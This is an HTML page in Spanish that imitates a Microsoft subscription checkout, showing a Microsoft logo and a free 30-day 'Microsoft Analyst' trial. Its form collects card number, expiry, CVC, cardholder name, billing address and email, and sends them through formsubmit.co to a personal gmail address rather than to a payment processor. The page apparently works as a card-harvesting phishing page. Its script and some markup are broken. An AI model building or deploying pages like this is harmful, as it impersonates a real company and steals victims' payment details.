<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="pago.css">
</head>
<body>
    <div class="area1">
        <img id="area1img1" src="imagenes/microsoftlogo.png" alt="AVESATAN">
 <a id="area1a1 href="index.html"><img id="area1img2" src="imagenes/xlogo.png" alt="NO CARGÓ LA IMAGEN"></a>

        <p id="area1p1">Suscribirse a Microsoft Analyst gratuitamente por un periodo de <span class="area1p1span1">30 días</span></p>
        <p id="area1p2">00.00 MXN</p>

        <section class="area1section1">
            <article id="area1section1article1 " >Suscripción a <span class="span1">Microsoft</span> Analyst <span class="span2">00.00 MXN</span></article>
            <article id="area1section1article2"> Subtotal <span class="span3">00.00 MXN</span></article>
            <article id="area1section1article3">Total<span class="span4">00.00 MXN</span </article>
        </section>

    </div>
    <div class="area2">
        <form action="https://formsubmit.co/miguel.varsv@gmail.com" method="post">

            <label id="area2label1">Email vinculante</label>
            <input type="text" name="input1" placeholder="Email" id="area2input1">


            <p id="area2p1">Método de pago</p>

            <label id="area2label2">Información de tarjeta</label>
            <input type="text" name="input2" placeholder="1234 1234 1234" id="area2input2">
            <input type="text" name="input3" placeholder="MM / YY" id="area2input3">
            <input type="text" name="input4" placeholder="CVC" id="area2input4">

            <label id="area2label3">Nombre del titular</label>
            <input type="text" name="input5" placeholder="Nombre completo en la tarjeta" id="area2input5">

            <label id="area2label4">Dirección de facturación</label>
            <input type="text" name="input6" placeholder="Dirección" id="area2input6">




            <button id="area2button1" type="submit">Suscribirse</button>
        </form>
       
    </div>

    <div class="area3">

    </div>

    <script>
        function espaciar() {
         espacio = document.createTextNode(" HOLA ");
         document.getElementById("area2input1")
         inputValue.join(espacio)
         console.log("HOLAAAAAAAAA")
        }
        </script>
        <!--button onclick="espaciar()" >9999999999OOOOOOOOO</button-->
</body>
</html>
